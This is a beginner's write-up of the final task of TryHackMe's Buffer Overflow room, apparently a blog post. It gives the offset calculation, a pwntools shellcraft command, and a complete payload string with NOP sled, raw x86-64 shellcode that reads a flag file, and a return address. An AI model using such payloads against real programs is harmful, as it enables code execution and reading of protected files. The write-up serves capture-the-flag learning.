Intro & Kudos

After struggling a bit with the Buffer Overflow Room on TryHackMe I’ve finally managed to complete it thanks to the precious help of l1ge’s writeup for task 8.

Since solving the last task wasn’t as straightforward as I first expected, I thought some of you might benefit from this quick writeup in case you’re bumping into a dead end.

Finding the offset

This bit is easy by just following l1ge’s explanation. It should be trivial to determine that the offset is a total of 169 bytes, which is basically the 154 bytes of the char buffer + 9 bytes for the saved registers + 6 bytes for the return address.

Picking a shell code

This is where it gets tricky. You can follow the same steps described by l1ge, and quickly find that the uid for the user that owns the flag file (user3) is 1003, but for someone reason setting the real uid won’t work (at least it didn’t for me, and I’ve followed the exact same steps as before). Some kind of additional protection must be in place, although I couldn’t figure out which one.

My workaround was simply to bypass getting a shell altogether, and instead use pwntools to craft some shellcode to directly list the contents of the flag file, like this:

┌──(root💀kali)-[~]
└─# pwn shellcraft -f d amd64.linux.cat secret.txt

The resulting is 12 bytes longer than l1ge’s, and so the final payload looked like this:

$(python -c "print '\x90'*88+'\x68\x79\x75\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\xb8\x73\x65\x63\x72\x65\x74\x2e\x74\x50\x6a\x02\x58\x48\x89\xe7\x31\xf6\x99\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05' + 'A'*23 + 'ADDR_BEFORE_STRT_OF_CODE'")

From there on, all you have to do is follow the same steps to find the address of the shellcode, and pick a memory address within the NOP region (don’t forget to convert to Little Endian). For me that was:

\x58\xe2\xff\xff\xff\x7f

Hope that helped! If there’s anything that could be improved here do let me know - I’m a complete beginner in this type of challenge, and would love to learn more!